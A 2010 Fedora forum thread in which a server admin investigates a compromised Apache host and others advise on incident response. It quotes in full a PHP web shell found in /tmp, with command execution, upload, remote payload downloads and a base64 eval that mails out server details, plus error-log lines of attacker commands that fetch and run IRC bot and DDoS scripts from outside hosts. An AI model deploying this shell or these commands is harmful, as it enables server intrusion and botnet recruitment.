finding the source of a break in

LaKing · #1 16th July 2010, 12:50 PM

Hi folks.

I noticed a very very high cpu usage on my webserver. All four CPUs were running on 100%.
Top shows several perl processes from apache that run for a long time, with a high %CPU.

Since the server was fc10, I did a fresh installation to fc13, and the fresh installation didn't have this issue. Then I loaded back all the user-data, and it started again.

Several, 4, 6, 8, ... 100 perl processes from apache.

lsof -p with the pid of such a process

Code:

erl    2708 apache  cwd    DIR               8,50     4096      2 /
perl    2708 apache  rtd    DIR               8,50     4096      2 /
perl    2708 apache  txt    REG               8,50    12952  88227 /usr/bin/perl
perl    2708 apache  mem    REG               8,50  1488512  32257 /usr/lib64/perl5/CORE/libperl.so
perl    2708 apache  mem    REG               8,50   150672  37544 /lib64/ld-2.12.so
perl    2708 apache  mem    REG               8,50  1838312  74443 /lib64/libc-2.12.so
perl    2708 apache  mem    REG               8,50   141592  74572 /lib64/libpthread-2.12.so
perl    2708 apache  mem    REG               8,50    22536  74451 /lib64/libdl-2.12.so
perl    2708 apache  mem    REG               8,50   598816  83467 /lib64/libm-2.12.so
perl    2708 apache  mem    REG               8,50   113904  74462 /lib64/libresolv-2.12.so
perl    2708 apache  mem    REG               8,50    43392  78993 /lib64/libcrypt-2.12.so
perl    2708 apache  mem    REG               8,50   366344  78992 /lib64/libfreebl3.so
perl    2708 apache  mem    REG               8,50   116368  65479 /lib64/libnsl-2.12.so
perl    2708 apache  mem    REG               8,50    17520  85923 /lib64/libutil-2.12.so
perl    2708 apache  mem    REG               8,50    85936   8923 /usr/lib64/perl5/auto/Storable/Storable.so
perl    2708 apache  mem    REG               8,50    17976   8700 /usr/lib64/perl5/auto/Fcntl/Fcntl.so
perl    2708 apache  mem    REG               8,50    25640   8918 /usr/lib64/perl5/auto/Socket/Socket.so
perl    2708 apache  mem    REG               8,50    19384   8720 /usr/lib64/perl5/auto/IO/IO.so
perl    2708 apache    0r   CHR                1,3      0t0   3988 /dev/null
perl    2708 apache    1w  FIFO                0,8      0t0  75232 pipe
perl    2708 apache    2w   REG               8,50   650730  87803 /var/log/httpd/error_log
perl    2708 apache    3u  IPv4              75558      0t0    TCP r2.d250.hu:34516->89.208.121.194:6777 (ESTABLISHED)
perl    2708 apache  238r   REG               8,50  1156240 279981 /usr/share/GeoIP/GeoIP.dat
perl    2708 apache  241u  unix 0xffff8801dc8e7600      0t0  75219 socket

The estabilished connection is sometimes "proud2pirate.com" wich is a non-existing domain.

LaKing · #2 16th July 2010, 12:55 PM

I found a "conf.php" file in /tmp, as once a process indicated the use of that folder.

PHP Code:


			
<title>-x: #SEMBON CrEw :x-</title>

<body text="lightblue" bgcolor="black">

<font face="Verdana" color="red" size="3">

<div align="left">

<p align="center">

<b>#SEMBON CrEw</b>

<font face="Verdana" color="yellow" size="2">

<p align="center">

<b>Bluetooth</b>

</p>

<hr>

<div align="left">

<b>

<?phpcloselog( );$user = get_current_user( );$login = posix_getuid( );$euid = posix_geteuid( );$ver = phpversion( );$up = `uptime`;$gid = posix_getgid( );if ($chdir == "") $chdir = getcwd( );if(!$whoami)$whoami=exec("whoami");?>

<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">

<?php$uname = posix_uname( );while (list($info, $value) = each ($uname)) {?>

<TR>

<TD align="left">

<DIV STYLE="font-family: verdana; font-size: 10px;">

<b>

<span style="font-size: 9pt">

<?= $info ?>

<span style="font-size: 9pt">:</b> <?= $value ?>

</span>

</DIV>

</TD>

</TR>

<?php}?>

<TR>

<TD align="left">

<DIV STYLE="font-family: verdana; font-size: 10px;">

<b>

<span style="font-size: 9pt">User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</span>

</DIV>

</TD>

</TR>

<TR>

<TD align="left">

<DIV STYLE="font-family: verdana; font-size: 10px;">

<b>

<span style="font-size: 9pt">Current Path:</b> <?= $chdir ?>

</span>

</DIV>

</TD>

</TR>

<TR>

<TD align="left">

<DIV STYLE="font-family: verdana; font-size: 10px;">

<b>

<span style="font-size: 9pt">Write Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?>

</span>

</DIV>

</TD>

</TR>  <TR>

<TD align="left">

<DIV STYLE="font-family: verdana; font-size: 10px;">

<b>

<span style="font-size: 9pt">Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?>

</span>

</DIV>

</TD>

</TR>

<TR>

<TD align="left">

<DIV STYLE="font-family: verdana; font-size: 10px;">

<b>

<span style="font-size: 9pt">Server Address:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?>

</span>

</DIV>

</TD>

</TR>

<TR>

<TD align="left">

<DIV STYLE="font-family: verdana; font-size: 10px;">

<b>

<span style="font-size: 9pt">Script Current User:</b> <?= $user ?>

</span>

</DIV>

</TD>

</TR>

<TR>

<TD align="left">

<DIV STYLE="font-family: verdana; font-size: 10px;">

<b>

<span style="font-size: 9pt">UP Time:</b> <?= $up ?>

</span>

</DIV>

</TD>

</TR>

<TR>

<TD align="left">

<DIV STYLE="font-family: verdana; font-size: 10px;">

<b>

<span style="font-size: 9pt">PHP Version:</b> <?= $ver ?>

</span>

</DIV>

</TD>

</TR>

<TR>

<TD align="left">

<DIV STYLE="font-family: verdana; color: red ; font-size: 10px;">

<b>

<span style="font-size: 9pt">Wget:</b> <? if(exec("wget --help")){ echo "Yes"; }else{ echo "No"; } ?>

</span>

</DIV>

</TD>

</TR> </TABLE>

</b>

</font>

<?phpset_magic_quotes_runtime(0);$currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);$UName  = `uname -a`;$SCWD   = `pwd`;$UserID = `id`;if( $currentWD == "" ) {    $currentWD = $SCWD;}if( $_POST['_act'] == "[W]Dir" ) {    $currentCMD = "find . -type d -perm -2 -ls";}if( $_POST['_act'] == "GAE PSY" ) {    $currentCMD = "mkdir /tmp/....;cd /tmp/....;wget http://www.php.monacoyachtshow.org/zoneperso/images/psy.tar.gz;tar -zxvf psy.tar.gz;rm -rf psy.tar.gz;cd /tmp/..../.psy;./config $currentCMD ;./****;./run";}if( $_POST['_act'] == "GAE SHELL" ) {    $currentCMD = "wget http://www.koreadefence.net/data/ReMaJA/xshell.txt;mv xshell.txt info.php";}if( $_POST['_act'] == "PROXY" ) {    $currentCMD = "mkdir /tmp/....;cd /tmp/..../;wget http://www.php.monacoyachtshow.org/zoneperso/images/proxy.tgz;tar -zxvf proxy.tgz;rm -rf proxy.tgz;cd /tmp/.../pro;./prox -d -a -p$currentCMD";}if( $_POST['_act'] == "CHECK" ) {    $currentCMD = "ps x";}if( $_POST['_act'] == "LIST IP" ) {    $currentCMD = "/sbin/ifconfig | grep inet";}if( $_POST['_act'] == "PORTS" ) {    $currentCMD = "netstat -an";}if( $_POST['_act'] == "List Files" ) {    $currentCMD = "ls -la";}print "<form method=post enctype=\"multipart/form-data\">

<hr>

<table>";print "<tr>

<td>

<b>Execute command:</b>

</td>

<td>

<input size=100 name=\"_cmd\" value=\"".$currentCMD."\">

</td>";print "<td>

<input type=submit name=_act value=\"EXECT\">

<input type=submit name=_act value=\"GAE PSY\">

<input type=submit name=_act value=\"PROXY\">

</td>

</tr>";print "<tr>

<td>

<b>Change directory:</b>

</td>

<td>

<input size=100 name=\"_cwd\" value=\"".$currentWD."\">

</td>";print "<td>

<input type=submit name=_act value=\"List Files\">

<input type=submit name=_act value=\"[W]Dir\">

<input type=submit name=_act value=\"GAE SHELL\">

</td>

</tr>";print "<tr>

<td>

<b>Upload file:</b>

</td>

<td>

<input size=85 type=file name=_upl>

</td>";print "<td>

<input type=submit name=_act value=\"Upload!\">

</td>

</tr>";print "<tr>

<td>

<input type=submit name=_act value=\"HELP\">

<input type=submit name=_act value=\"CHECK\">

<input type=submit name=_act value=\"LIST IP\">

<input type=submit name=_act value=\"PORTS\">

</td>

</tr>";print "</table>

</form>

<hr>";$currentCMD = str_replace("\\\"","\"",$currentCMD);$currentCMD = str_replace("\\\'","\'",$currentCMD);if( $_POST['_act'] == "HELP" ) {print "<table>";print "<tr>

<td>Command EXECT = Untuk menjalankan perintah.</td>

</tr>";print "<tr>

<td>Command PROXY = Masukkan port proxy di kolom EXECT.</td>

</tr>";print "<tr>

<td>Command GAE PSY = Masukkan port di kolom EXECT.</td>

</tr>";print "<tr>

<td>Command GAE SHELL = Menginstall Shell .</td>

</tr>";print "<tr>

<td>Command LIST IP = Untuk mengetahui IP Shell.</td>

</tr>";print "<tr>

<td>Command LIST = Untuk melihat isi direktori.</td>

</tr>";print "<tr>

<td>Command [W]Dir = Untuk melihat direktori WRITE.</td>

</tr>";print "<tr>

<td>Command PORTS = Untuk melihat port yg terbuka.</td>

</tr>";print "<tr>

<td>Command CHECK = Untuk melihat semua proses.</td>

</tr>";print "</table>

</form>

<hr>

<hr>";}if( $_POST['_act'] == "Upload!" ) {if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {print "<center>

<b>DancoX ErroR!</b>

</center>";} else {print "<center>

<pre>";system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");print "</pre>

<b>Upload Berhasil CoY!</b>

</center>";}    } else {print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";$currentCMD = "cd ".$currentWD.";".$currentCMD;system("$currentCMD 1> /tmp/sembonShell 2>&1; cat /tmp/sembonShell; rm -rf /tmp/sembonShell");print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center>

<hr>

<center>

<b>#SEMBON CrEw!</b>

</center>";}?>

</body>

</font>

</font>

</b>

</font>

<?php$lmge = "JGNyZWF0b3I9YmFzZTY0X2RlY29kZSgiWW1GdUxtUmhaMlV3TjBCbmJXRnBiQzVqYjIwPSIpOw0KKCRzYWZlX21vZGUpPygkc2FmZXo9Ik9OIik6KCRzYWZlej0iT0ZGX0hFSEUiKTsNCiRiYXNlPSJodHRwOi8vIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107IA0KJG5hbWUgPSBwaHBfdW5hbWUoKTsgJGlwID0gZ2V0ZW52KCJSRU1PVEVfQUREUiIpOyAkaXAyID0gZ2V0aG9zdGJ5YWRkcigkX1NFUlZFUltSRU1PVEVfQUREUl0pOyAkc3ViaiA9ICRfU0VSVkVSWydIVFRQX0hPU1QnXTsgDQokbXNnID0gIlxuQkFTRTogJGJhc2VcbnVuYW1lIGE6ICRuYW1lXG5CeXBhc3M6ICRieXBhc3NlclxuSVA6ICRpcFxuSG9zdDogJGlwMiAkcHdkcyI7DQokZnJvbSA9IkZyb206ICIuJHdyaXQuIl9fXz0iLiRzYWZlei4iPHRvb2xAIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIj4iOw0KbWFpbCggJGNyZWF0b3IsICRzdWJqLCAkbXNnLCAkZnJvbSk7"; eval(base64_decode($lmge));exit;?>

---------- Post added at 01:55 PM CDT ---------- Previous post was at 01:51 PM CDT ----------

Killing those processes by pid helps only temporary.

I would like to know, how I could find the caller script, or whatever is triggering this process, so I can get rid of it. Then I will assign new passwords to all users.

Any ideas? Thank you. ...

FC13 with the latest updates, mod_security is installed, ....

#3 16th July 2010, 05:22 PM

Quote:

Originally Posted by LaKing

I would like to know, how I could find the caller script, or whatever is triggering this process, so I can get rid of it. Then I will assign new passwords to all users.

The problem is the PHP application or script you're running. It allows (or might allow) remote downloads and process control through the web server account. Reinstalling or upgrading an OS is the best thing you can do for a cracker as you've helped it to cover its tracks.

Best way would be to
- save full process, network, open files and user login records,
- shut down any services unnecessary for cleaning up (meaning keep SSH, kill any FTP daemon, MySQL, web server and rogue processes),
- raise the firewall to only allow traffic from and to your management IP (range),
- verify package integrity and check your loks (Logwatch?), and
- run checks from a checklist like say http://web.archive.org/web/200801092...checklist.html. With web stack compromises like these chances are the kids didn't look for root access but you want to make certain.

jpollard · #4 16th July 2010, 05:59 PM

if you take a full "ps" listing (ps -elf) and put it in a file then you can follow
the process tree - Each process entry will have it's parent process
listed. As long as that parent hasn't terminated, the parent process will
not be shown as 1.

By following the tree you will eventually get to what started it.

You can also try "ps -eH" which will create a tree formatted output, but it
will not contain quite as much information (such as process owner), but you
can include that (use "ps -elH", but it makes the listing much wider).

Zanpactou · #5 16th July 2010, 06:53 PM

Quote:

Originally Posted by unSpawn

The problem is the PHP application or script you're running. It allows (or might allow) remote downloads and process control through the web server account.

Could be perl too if you are letting them have perl access.

Quote:

Originally Posted by unSpawn

Reinstalling or upgrading an OS is the best thing you can do for a cracker as you've helped it to cover its tracks.

Not really. Finding and prosecuting them with the information they've left is usually futile. If they have gained root access re-installing is the best thing you can do.

Back up each user account again and restore each one individually until you find the culprit.
Shut down the offending account(s) Permanently.

Thanks,
Zanpactou

#6 16th July 2010, 11:09 PM

Quote:

Originally Posted by Zanpactou

Could be perl too if you are letting them have perl access.

Good one. Basically any interpreter.

* BTW who mentioned prosecution or root level compromises?.. NM, since you've got the certifications and have handled R/L incidents longer than me I'm sure you know SOP way better than I do.

Zanpactou · #7 17th July 2010, 12:58 AM

Quote:

Originally Posted by unSpawn

Good one. Basically any interpreter.

Yes and anything in the cgi directories too. If you are letting users upload and use stuff in a cgi directory or per-user cgi directories.

But yeah, looks like a rogue perl script.
Thinking about it, you could isolate all the .pl scripts in the user's directories, back them up and then delete them to see if the problem stops.

FYI : This looks to be someone trying to use an account on your server as part of a bot net or to serve or distribute, seed, etc torrent files.
It looks very much to me like the bot net.
I say that because surely you have per user quotas for resource usage, in/out connections along with a firewall set up?
In the UK where I'm from, they recently passed the DBB so I would just call the Police if I found a bot net on a server now and let them collect any information in order to bring the criminals to justice, whereas before I wouldn't have cared and just stopped it.

Thanks,
Zanpactou

#8 17th July 2010, 08:53 AM

Quote:

Originally Posted by Zanpactou

But yeah, looks like a rogue perl script.

You sure it's Perl?

Quote:

Originally Posted by Zanpactou

Thinking about it, you could isolate all the .pl scripts in the user's directories, back them up and then delete them to see if the problem stops.

That's a friendly thing to do. For the cracker that is. While you're busy finding out and until you found the infection vector it still has access.

Quote:

Originally Posted by Zanpactou

This looks to be someone trying to use an account on your server as part of a bot net or to serve or distribute, seed, etc torrent files.
It looks very much to me like the bot net. I say that because surely you have (..)

If you actually read the file you'd see it's just a PHP-based control shell. Translating text you can read "To run the command. Enter the proxy port in the column EXECT. Insert port on EXECT column. Installing Command Shell. To know the IP Shell. To view the contents of the directory. WRITE To view the directory. To see an open port. To see all the processes.". It creates a "/tmp/...." directory, can download three items (if the names say anything about the functionality then it's an IRC bouncer: psy.tar.gz, a command shell: xshell.txt and some proxy: proxy.tgz) and configure and run them, it uses a temporary file "/tmp/sembonShell" and the proxy might not work if it got the paths wrong as it reads "/tmp/.../pro" instead of four dots. So no "evidence" for botnet applications or torrents.

Zanpactou · #9 17th July 2010, 11:49 AM

Quote:

Originally Posted by unSpawn

If you actually read the file you'd see it's just a PHP-based control shell. Translating text you can read "To run the command. Enter the proxy port in the column EXECT. Insert port on EXECT column. Installing Command Shell. To know the IP Shell. To view the contents of the directory. WRITE To view the directory. To see an open port. To see all the processes.". It creates a "/tmp/...." directory, can download three items (if the names say anything about the functionality then it's an IRC bouncer: psy.tar.gz, a command shell: xshell.txt and some proxy: proxy.tgz) and configure and run them, it uses a temporary file "/tmp/sembonShell" and the proxy might not work if it got the paths wrong as it reads "/tmp/.../pro" instead of four dots. So no "evidence" for botnet applications or torrents.

Hmm. I see. You are one of those people.

Look at his top output. perl.
If there are many accounts, how is one php file proof of the full extent of any kind of problem?
It isn't.

Thanks,
Zanpactou

LaKing · #10 17th July 2010, 02:51 PM

Thank you guy's for all those reply's. ...

IMO reinstalling was a good choice, the OS was outdated, and I hope that this makes the re-entering to my server a bit more difficult. However, I still have the old OS too, and all files, and all log files saved. I could even boot into the old os. ... If there would be a point in it.

Here is some current process stress, that is running. ...
Pid 30290 and 30635 run each with High CPU usage. 'Top' says they are all perl.

Code:

1 	root 	Jul16 	/sbin/init
[ .. lots of processes, and at the end of 1 ...]
   30290 	apache 	09:20 	[bash]
   30635 	apache 	10:08 	/sbin/klogd 
[...]

Code:

Open Files and Connections For process [bash] (PID 30290)

Open files
File Descriptor    	Type    	File size    	Inode    	Path   
Current dir 	Directory 	4096 	2 	/
Root dir 	Directory 	4096 	2 	/
Program code 	Regular file 	12952 	8428 	/usr/bin/perl
Shared library 	Regular file 	150672 	11379 	/lib64/ld-2.12.so
Shared library 	Regular file 	1838296 	11527 	/lib64/libc-2.12.so
Shared library 	Regular file 	141576 	12072 	/lib64/libpthread-2.12.so
Shared library 	Regular file 	22536 	18787 	/lib64/libdl-2.12.so
Shared library 	Regular file 	1488512 	13602 	/usr/lib64/perl5/CORE/libperl.so
Shared library 	Regular file 	598816 	20711 	/lib64/libm-2.12.so
Shared library 	Regular file 	113904 	83765 	/lib64/libresolv-2.12.so
Shared library 	Regular file 	43392 	85916 	/lib64/libcrypt-2.12.so
Shared library 	Regular file 	366344 	85915 	/lib64/libfreebl3.so
Shared library 	Regular file 	17520 	84424 	/lib64/libutil-2.12.so
Shared library 	Regular file 	116368 	85097 	/lib64/libnsl-2.12.so
Shared library 	Regular file 	85936 	8922 	/usr/lib64/perl5/auto/Storable/Storable.so
Shared library 	Regular file 	17976 	8698 	/usr/lib64/perl5/auto/Fcntl/Fcntl.so
Shared library 	Regular file 	25640 	83717 	/usr/lib64/perl5/auto/Socket/Socket.so
Shared library 	Regular file 	19384 	8718 	/usr/lib64/perl5/auto/IO/IO.so
2w 	Regular file 	866183 	87803 	/var/log/httpd/error_log
238r 	Regular file 	1156240 	279981 	/usr/share/GeoIP/GeoIP.dat
Open network connections
Type    	Protocol    	File Descriptor    	Details   
IPV4 	TCP 	3u 	195.228.45.188:35803 	-> 	89.208.121.194:6777 	ESTABLISHED

Code:

Open Files and Connections For process /sbin/klogd (PID 30635)

Open files
File Descriptor    	Type    	File size    	Inode    	Path   
Current dir 	Directory 	4096 	2 	/
Root dir 	Directory 	4096 	2 	/
Program code 	Regular file 	12952 	8428 	/usr/bin/perl
Shared library 	Regular file 	150672 	11379 	/lib64/ld-2.12.so
Shared library 	Regular file 	1838296 	11527 	/lib64/libc-2.12.so
Shared library 	Regular file 	141576 	12072 	/lib64/libpthread-2.12.so
Shared library 	Regular file 	22536 	18787 	/lib64/libdl-2.12.so
Shared library 	Regular file 	1488512 	13602 	/usr/lib64/perl5/CORE/libperl.so
Shared library 	Regular file 	598816 	20711 	/lib64/libm-2.12.so
Shared library 	Regular file 	113904 	83765 	/lib64/libresolv-2.12.so
Shared library 	Regular file 	43392 	85916 	/lib64/libcrypt-2.12.so
Shared library 	Regular file 	366344 	85915 	/lib64/libfreebl3.so
Shared library 	Regular file 	17520 	84424 	/lib64/libutil-2.12.so
Shared library 	Regular file 	116368 	85097 	/lib64/libnsl-2.12.so
Shared library 	Regular file 	85936 	8922 	/usr/lib64/perl5/auto/Storable/Storable.so
Shared library 	Regular file 	17976 	8698 	/usr/lib64/perl5/auto/Fcntl/Fcntl.so
Shared library 	Regular file 	25640 	83717 	/usr/lib64/perl5/auto/Socket/Socket.so
Shared library 	Regular file 	19384 	8718 	/usr/lib64/perl5/auto/IO/IO.so
2w 	Regular file 	866183 	87803 	/var/log/httpd/error_log
238r 	Regular file 	1156240 	279981 	/usr/share/GeoIP/GeoIP.dat
Open network connections
Type    	Protocol    	File Descriptor    	Details   
IPV4 	TCP 	3u 	195.228.45.188:37396 	-> 	89.208.121.194:6777 	ESTABLISHED

LaKing · #11 17th July 2010, 02:52 PM

In my httpd settings all logs go to /logs/...
.. so it appears strange to me that something is logging to /var/log/https/error_log

Code:

sh: -c: line 0: `cd /var/tmp;cd /tmp;lwp-download <a href="http://www.idariyargi.org//modules/mod_yoo_login/styles/ddos.txt"  rel="external"><i>link</i></a> -O ddos.txt;curl -O <a href="http://www.idariyargi.org//modules/mod_yoo_login/styles/ddos.txt"  rel="external"><i>link</i></a> -O ddos.txt;perl ddos.txt'

curl: (6) Could not resolve host: novayesyoucan.org; Cannot allocate memory
mv: cannot stat `sss.txt': No such file or directory
chmod: cannot access `sh.php': No such file or directory
ls: cannot access sh.php: No such file or directory
sh: fetch: command not found
mv: cannot stat `sss.txt': No such file or directory
chmod: cannot access `sh.php': No such file or directory
ls: cannot access sh.php: No such file or directory
sh: wget: command not found
mv: cannot stat `sss.txt': No such file or directory
chmod: cannot access `sh.php': No such file or directory
ls: cannot access sh.php: No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed

  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0Warning: Failed to create the file lite.txt: Permission denied

  0  189k    0  1448    0     0  10084      0  0:00:19 --:--:--  0:00:19 33674
curl: (23) Failed writing body (0 != 1448)

[...]

mv: cannot stat `lite.txt': No such file or directory
chmod: cannot access `sh.php': No such file or directory
ls: cannot access sh.php: No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed

  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0Warning: Failed to create the file lite.txt: Permission denied

  0  189k    0  1448    0     0  10961      0  0:00:17 --:--:--  0:00:17 39135
curl: (23) Failed writing body (0 != 1448)
mv: cannot stat `lite.txt': No such file or directory
chmod: cannot access `sh.php': No such file or directory
ls: cannot access sh.php: No such file or directory
sh: wget: command not found
mv: cannot stat `lite.txt': No such file or directory

sh: -c: line 0: syntax error near unexpected token `<'
sh: -c: line 0: `cd /var/tmp;cd /tmp;lwp-download <a href="http://my.heritagedreamscapes.com/e107_docs/.bs.jpg;perl"  rel="external"><i>link</i></a> .bs.jpg irc.byroe.net 6667;rm -rf *.*;curl -O <a href="http://my.heritagedreamscapes.com/e107_docs/.bs.jpg;perl"  rel="external"><i>link</i></a> .bs.jpg irc.byroe.net 6667;rm -rf *.*'
sh: -c: line 0: syntax error near unexpected token `<'

[...]

sh: -c: line 0: `cd /var/tmp;cd /tmp;lwp-download <a href="http://pvvkus.ru/e107_images/iso.txt"  rel="external"><i>link</i></a> -O iso.txt;curl -O <a href="http://pvvkus.ru/e107_images/iso.txt"  rel="external"><i>link</i></a> -O iso.txt;perl iso.txt irc.ownzirc.co.cc'
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed

  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0Warning: Failed to create the file lite.txt: Permission denied

  0  189k    0  1448    0     0   7317      0  0:00:26 --:--:--  0:00:26 19306
curl: (23) Failed writing body (0 != 1448)
mv: cannot stat `lite.txt': No such file or directory
chmod: cannot access `sh.php': No such file or directory
ls: cannot access sh.php: No such file or directory
sh: wget: command not found
mv: cannot stat `lite.txt': No such file or directory
chmod: cannot access `sh.php': No such file or directory
ls: cannot access sh.php: No such file or directory
mv: cannot stat `lite.txt': No such file or directory
chmod: cannot access `sh.php': No such file or directory
ls: cannot access sh.php: No such file or directory
find: `./e107_plugins/log': Permission denied
sh: wget: command not found
ls: cannot access mod.php: No such file or directory
sh: -c: line 0: syntax error near unexpected token `<'
sh: -c: line 0: `cd /var/tmp;cd /tmp;lwp-download <a href="http://pvvkus.ru/e107_images/scan.txt"  rel="external"><i>link</i></a> -O scan.txt;curl -O <a href="http://pvvkus.ru/e107_images/scan.txt"  rel="external"><i>link</i></a> -O scan.txt;perl scan.txt'
sh: -c: line 0: syntax error near unexpected token `<'
sh: -c: line 0: `cd /var/tmp;cd /tmp;lwp-download <a href="http://pvvkus.ru/e107_images/scan.txt"  rel="external"><i>link</i></a> -O scan.txt;curl -O <a href="http://pvvkus.ru/e107_images/scan.txt"  rel="external"><i>link</i></a> -O scan.txt;perl scan.txt'
sh: -c: line 0: syntax error near unexpected token `<'

[...]

sh: -c: line 0: syntax error near unexpected token `<'
sh: -c: line 0: `kill-all -9 perl;rm -fr *;curl -O <a href="http://allsib.info/administrator/templates/system/html/def.txt;mv"  rel="external"><i>link</i></a> def.txt index.php;lwp-download <a href="http://allsib.info/administrator/templates/system/html/def.txt;mv"  rel="external"><i>link</i></a> def.txt index.php;cd /var/tmp;cd /tmp;rm -fr *;lwp-download <a href="http://allsib.info/administrator/templates/system/html/bsd.xp"  rel="external"><i>link</i></a> -O bsd.xp;curl -O <a href="http://allsib.info/administrator/templates/system/html/bsd.xp"  rel="external"><i>link</i></a> -O bsd.xp;wget <a href="http://allsib.info/administrator/templates/system/html/bsd.xp"  rel="external"><i>link</i></a> -O bsd.xp;perl bsd.xp irc.planetwork-team.co.cc'

[...]

sh: -c: line 0: `kill-all -9 perl;rm -fr *;curl -O <a href="http://dizzycoder.go.ro/log/logs/def.txt;mv"  rel="external"><i>link</i></a> def.txt index.php;lwp-download <a href="http://dizzycoder.go.ro/log/logs/def.txt;mv"  rel="external"><i>link</i></a> def.txt index.php;cd /var/tmp;cd /tmp;rm -fr *;lwp-download <a href="http://dizzycoder.go.ro/log/logs/win.xp"  rel="external"><i>link</i></a> -O win.xp;curl -O <a href="http://dizzycoder.go.ro/log/logs/win.xp"  rel="external"><i>link</i></a> -O win.xp;wget <a href="http://dizzycoder.go.ro/log/logs/win.xp"  rel="external"><i>link</i></a> -O win.xp;perl win.xp irc.allnetwork.org'
sh: -c: line 0: syntax error near unexpected token `<'
sh: -c: line 0: `kill-all -9 perl;rm -fr *;curl -O <a href="http://dizzycoder.go.ro/log/logs/def.txt;mv"  rel="external"><i>link</i></a> def.txt index.php;lwp-download <a href="http://dizzycoder.go.ro/log/logs/def.txt;mv"  rel="external"><i>link</i></a> def.txt index.php;cd /var/tmp;cd /tmp;rm -fr *;lwp-download <a href="http://dizzycoder.go.ro/log/logs/win.xp"  rel="external"><i>link</i></a> -O win.xp;curl -O <a href="http://dizzycoder.go.ro/log/logs/win.xp"  rel="external"><i>link</i></a> -O win.xp;wget <a href="http://dizzycoder.go.ro/log/logs/win.xp"  rel="external"><i>link</i></a> -O win.xp;perl win.xp irc.allnetwork.org'
sh: wget: command not found
sh: wget: command not found
tar: psy.tar.gz: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Exiting with failure status due to previous errors
tar: psy.tar.gz: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
sh: line 0: cd: /tmp/.psy: No such file or directory
tar: Child returned status 2
tar: Exiting with failure status due to previous errors
sh: line 0: cd: /tmp/.psy: No such file or directory
sh: ./config: No such file or directory
sh: ./config: No such file or directory
sh: ./****: No such file or directory
sh: ./****: No such file or directory
sh: ./run: No such file or directory
sh: ./run: No such file or directory
sh: wget: command not found
tar: psy.tar.gz: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Exiting with failure status due to previous errors
sh: line 0: cd: /tmp/.psy: No such file or directory
sh: wget: command not found
sh: ./config: No such file or directory
tar: psy.tar.gz: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Exiting with failure status due to previous errors
sh: ./****: No such file or directory
sh: line 0: cd: /tmp/.psy: No such file or directory
sh: ./config: No such file or directory
sh: ./****: No such file or directory
sh: ./run: No such file or directory
sh: ./run: No such file or directory
sh: -c: line 0: syntax error near unexpected token `<'
sh: -c: line 0: `cd /var/tmp;cd /tmp;lwp-download <a href="http://picko.polopalo.com/airmata.txt??;perl"  rel="external"><i>link</i></a> airmata.txt;curl -O <a href="http://picko.polopalo.com/airmata.txt"  rel="external"><i>link</i></a> -O airmata.txt;perl airmata.txt'
sh: -c: line 0: syntax error near unexpected token `<'

[...]

sh: -c: line 0: `cd /var/tmp;cd /tmp;lwp-download <a href="http://picko.polopalo.com/airmata.txt"  rel="external"><i>link</i></a> -O airmata.txt;curl -O <a href="http://picko.polopalo.com/airmata.txt"  rel="external"><i>link</i></a> -O airmata.txt;perl airmata.txt'
sh: -c: line 0: syntax error near unexpected token `<'
sh: -c: line 0: `cd /var/tmp;cd /tmp;lwp-download <a href="http://picko.polopalo.com/airmata.txt"  rel="external"><i>link</i></a> -O airmata.txt;curl -O <a href="http://picko.polopalo.com/airmata.txt"  rel="external"><i>link</i></a> -O airmata.txt;perl airmata.txt'

LaKing · #12 17th July 2010, 03:15 PM

Somtimes I see a lot a lot a lot of <defunc> threads, .. usually when I kill some cpu eating processes. ...

Code:

IP address: 89.208.121.194
No host name is associated with this IP address or no reverse lookup is configured.

Error:Host not found

89.208.121.194 is from Russian Federation(RU) in region Eastern Europe

I could not ps out the information what is triggered from where, ..
It seems for me now, that my sever was used to some wide range attack or something, from some Russian IP. ... Since the re-install probably things don't work for them so good, but I still have some zombie processes starting up, and trying to do their job. ...
Whatever is left, it must be somewhere in my user's data .. which will be very hard to trace down.

Any suggestions welcome. Thank you very much.

Zanpactou · #13 17th July 2010, 11:02 PM

Quote:

Originally Posted by LaKing

It seems for me now, that my sever was used to some wide range attack or something, from some Russian IP.

botnet.

Quote:

Originally Posted by LaKing

Whatever is left, it must be somewhere in my user's data .. which will be very hard to trace down.

grep it. Maybe start with some of the offending addresses but without isolating the problem by de-activating all user accounts and then activating each user account individually until you find the culprit(s) and look through their data, it is a bit like needle + haystack grepping for evidence.

Thanks,
Zanpactou

#14 18th July 2010, 01:15 AM

Quote:

Originally Posted by Zanpactou

Look at his top output. perl.

Gah. That's just collateral. I doubt it's more than a simple RFI. So chance it was done in Perl as opposed to PHP is about 1 in 1M.

---------- Post added at 04:15 PM CDT ---------- Previous post was at 04:14 PM CDT ----------

Quote:

Originally Posted by LaKing

Any suggestions welcome.

Please read http://forums.fedoraforum.org/showpo...91&postcount=3 .

